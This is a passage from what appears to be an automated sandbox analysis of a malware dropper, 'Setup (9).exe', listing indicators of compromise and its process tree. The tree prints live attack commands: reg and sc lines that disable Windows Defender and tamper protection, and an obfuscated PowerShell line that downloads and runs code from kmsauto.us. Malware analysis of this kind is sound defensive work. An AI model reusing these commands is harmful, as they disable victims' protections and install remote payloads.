1636	Gfben_qsBhcpl2Qy7JmD_scc.exe
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
1080	WerFault.exe
1080	WerFault.exe
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
4856	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
4856	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
3100	Process not Found
3100	Process not Found
3292	WerFault.exe
3292	WerFault.exe
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3896	WerFault.exe
3896	WerFault.exe
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3100	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
1636	Gfben_qsBhcpl2Qy7JmD_scc.exe
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found
3100	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2332	pq5kzNRtl409ghB0EYFEFCkq.exe
Token: SeRestorePrivilege	1272	WerFault.exe
Token: SeBackupPrivilege	1272	WerFault.exe
Token: SeBackupPrivilege	1272	WerFault.exe
Token: SeDebugPrivilege	5284	AdvancedRun.exe
Token: SeImpersonatePrivilege	5284	AdvancedRun.exe
Token: SeTcbPrivilege	5504	svchost.exe
Token: SeTcbPrivilege	5504	svchost.exe
Token: SeDebugPrivilege	5852	taskkill.exe
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeDebugPrivilege	2540	luVc3NOWeOV05DUtbvpIs_eO.exe
Token: SeDebugPrivilege	1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found
Token: SeCreatePagefilePrivilege	3100	Process not Found
Token: SeShutdownPrivilege	3100	Process not Found

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
576	xUhCEE_8ET1Pwkmoq3M7wp9n.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3100	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3480 wrote to memory of 1300	3480	Setup (9).exe	109
PID 3480 wrote to memory of 1300	3480	Setup (9).exe	109
PID 3480 wrote to memory of 1300	3480	Setup (9).exe	109
PID 3480 wrote to memory of 1472	3480	Setup (9).exe	107
PID 3480 wrote to memory of 1472	3480	Setup (9).exe	107
PID 3480 wrote to memory of 1472	3480	Setup (9).exe	107
PID 3480 wrote to memory of 1648	3480	Setup (9).exe	106
PID 3480 wrote to memory of 1648	3480	Setup (9).exe	106
PID 3480 wrote to memory of 1648	3480	Setup (9).exe	106
PID 3480 wrote to memory of 1480	3480	Setup (9).exe	105
PID 3480 wrote to memory of 1480	3480	Setup (9).exe	105
PID 3480 wrote to memory of 1480	3480	Setup (9).exe	105
PID 3480 wrote to memory of 1936	3480	Setup (9).exe	101
PID 3480 wrote to memory of 1936	3480	Setup (9).exe	101
PID 3480 wrote to memory of 1936	3480	Setup (9).exe	101
PID 3480 wrote to memory of 1776	3480	Setup (9).exe	103
PID 3480 wrote to memory of 1776	3480	Setup (9).exe	103
PID 3480 wrote to memory of 1776	3480	Setup (9).exe	103
PID 3480 wrote to memory of 1900	3480	Setup (9).exe	102
PID 3480 wrote to memory of 1900	3480	Setup (9).exe	102
PID 3480 wrote to memory of 1900	3480	Setup (9).exe	102
PID 3480 wrote to memory of 1708	3480	Setup (9).exe	104
PID 3480 wrote to memory of 1708	3480	Setup (9).exe	104
PID 3480 wrote to memory of 2096	3480	Setup (9).exe	99
PID 3480 wrote to memory of 2096	3480	Setup (9).exe	99
PID 3480 wrote to memory of 2096	3480	Setup (9).exe	99
PID 3480 wrote to memory of 1844	3480	Setup (9).exe	100
PID 3480 wrote to memory of 1844	3480	Setup (9).exe	100
PID 3480 wrote to memory of 1844	3480	Setup (9).exe	100
PID 3480 wrote to memory of 2420	3480	Setup (9).exe	96
PID 3480 wrote to memory of 2420	3480	Setup (9).exe	96
PID 3480 wrote to memory of 2420	3480	Setup (9).exe	96
PID 3480 wrote to memory of 2332	3480	Setup (9).exe	98
PID 3480 wrote to memory of 2332	3480	Setup (9).exe	98
PID 3480 wrote to memory of 2408	3480	Setup (9).exe	95
PID 3480 wrote to memory of 2408	3480	Setup (9).exe	95
PID 3480 wrote to memory of 2408	3480	Setup (9).exe	95
PID 3480 wrote to memory of 2592	3480	Setup (9).exe	91
PID 3480 wrote to memory of 2592	3480	Setup (9).exe	91
PID 3480 wrote to memory of 2592	3480	Setup (9).exe	91
PID 3480 wrote to memory of 812	3480	Setup (9).exe	97
PID 3480 wrote to memory of 812	3480	Setup (9).exe	97
PID 3480 wrote to memory of 812	3480	Setup (9).exe	97
PID 3480 wrote to memory of 3668	3480	Setup (9).exe	90
PID 3480 wrote to memory of 3668	3480	Setup (9).exe	90
PID 3480 wrote to memory of 3668	3480	Setup (9).exe	90
PID 3480 wrote to memory of 2504	3480	Setup (9).exe	217
PID 3480 wrote to memory of 2504	3480	Setup (9).exe	217
PID 3480 wrote to memory of 2468	3480	Setup (9).exe	93
PID 3480 wrote to memory of 2468	3480	Setup (9).exe	93
PID 3480 wrote to memory of 2468	3480	Setup (9).exe	93
PID 3480 wrote to memory of 2440	3480	Setup (9).exe	94
PID 3480 wrote to memory of 2440	3480	Setup (9).exe	94
PID 3480 wrote to memory of 2440	3480	Setup (9).exe	94
PID 3480 wrote to memory of 908	3480	Setup (9).exe	89
PID 3480 wrote to memory of 908	3480	Setup (9).exe	89
PID 3480 wrote to memory of 908	3480	Setup (9).exe	89
PID 3480 wrote to memory of 1960	3480	Setup (9).exe	88
PID 3480 wrote to memory of 1960	3480	Setup (9).exe	88
PID 3480 wrote to memory of 1960	3480	Setup (9).exe	88
PID 3480 wrote to memory of 1436	3480	Setup (9).exe	191
PID 3480 wrote to memory of 1436	3480	Setup (9).exe	191
PID 3480 wrote to memory of 1436	3480	Setup (9).exe	191
PID 3480 wrote to memory of 2540	3480	Setup (9).exe	110

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe

C:\Users\Admin\AppData\Local\Temp\Setup (9).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (9).exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3480
- C:\Users\Admin\Documents\RH4NHdIBnS0CEOgGDSZ3gdPL.exe
  "C:\Users\Admin\Documents\RH4NHdIBnS0CEOgGDSZ3gdPL.exe"
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Users\Admin\Documents\fbvPOts0iekMatmN372ckwox.exe
  "C:\Users\Admin\Documents\fbvPOts0iekMatmN372ckwox.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:908
- C:\Users\Admin\Documents\qPUfR7EA7eqheAuR68beuWgh.exe
  "C:\Users\Admin\Documents\qPUfR7EA7eqheAuR68beuWgh.exe"
  2⤵
  - Executes dropped EXE
  PID:3668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3668 -s 236
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1080
- C:\Users\Admin\Documents\d9LlCd5qjRdcm1JDv_1czNAg.exe
  "C:\Users\Admin\Documents\d9LlCd5qjRdcm1JDv_1czNAg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2592
- - C:\Users\Admin\Documents\d9LlCd5qjRdcm1JDv_1czNAg.exe
    "C:\Users\Admin\Documents\d9LlCd5qjRdcm1JDv_1czNAg.exe"
    3⤵
    PID:6940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      PID:4284
- C:\Users\Admin\Documents\nXv2TKLa4Q_cWrMwlqbFAg5K.exe
  "C:\Users\Admin\Documents\nXv2TKLa4Q_cWrMwlqbFAg5K.exe"
  2⤵
  PID:2504
- - C:\Users\Admin\AppData\Local\Temp\lIaOVfGG.com
    "C:\Users\Admin\AppData\Local\Temp\lIaOVfGG.com"
    3⤵
    - Executes dropped EXE
    PID:1872
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3D48.tmp\3D49.tmp\3D4A.bat C:\Users\Admin\AppData\Local\Temp\lIaOVfGG.com"
      4⤵
      PID:5596
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:1604
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:5384
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:6040
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        
        PID:3460
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:2504
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:2548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1948
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:1512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5768
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6336
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5588
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6472
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6032
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:3252
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        
        PID:3008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:6292
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:5564
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:5824
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f
        5⤵
        
        PID:7356
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f
        5⤵
        
        PID:2028
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f
        5⤵
        
        PID:7380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:3004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
        5⤵
        
        PID:7416
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:8092
- - C:\Users\Admin\AppData\Local\Temp\cVOyMRjV.com
    "C:\Users\Admin\AppData\Local\Temp\cVOyMRjV.com"
    3⤵
    PID:5352
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      Blocklisted process makes network request
      PID:4984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:1236
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        6⤵
        
        PID:3196
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1236 -s 2636
        6⤵
        Program crash
        
        PID:3620
- - C:\Users\Admin\AppData\Local\Temp\GJLsLip8.com
    "C:\Users\Admin\AppData\Local\Temp\GJLsLip8.com"
    3⤵
    PID:5804
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
      4⤵
      Blocklisted process makes network request
      PID:2912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:3056
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        6⤵
        
        PID:3004
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        6⤵
        
        PID:1396
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3056 -s 2720
        6⤵
        Program crash
        
        PID:8864
- C:\Users\Admin\Documents\in9S_bZvzdH4yawbcTm1Vu_i.exe
  "C:\Users\Admin\Documents\in9S_bZvzdH4yawbcTm1Vu_i.exe"
  2⤵
  - Executes dropped EXE
  PID:2468
- C:\Users\Admin\Documents\6be_4JxQgoxk7yU0w5ylz5JY.exe
  "C:\Users\Admin\Documents\6be_4JxQgoxk7yU0w5ylz5JY.exe"
  2⤵
  - Executes dropped EXE
  PID:2440
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4820
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 288
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5320
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"
    3⤵
    PID:5912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:5676
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 288
      4⤵
      Program crash
      PID:7032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 288
      4⤵
      Program crash
      PID:1864
- C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
  "C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2408
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:5420
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:6012
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:4816
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:2832
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:5888
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:1436
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:2568
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2280
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3028
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:5452
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6412
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5432
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6976
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6704
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6168
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7008
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1392
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1876
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 28
      4⤵
      Program crash
      PID:1176
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5764
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5436
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6320
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6820
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2008
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4588
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    - Executes dropped EXE
    PID:5804
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4884
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7332
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7004
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4652
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6768
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7668
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7340
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1188
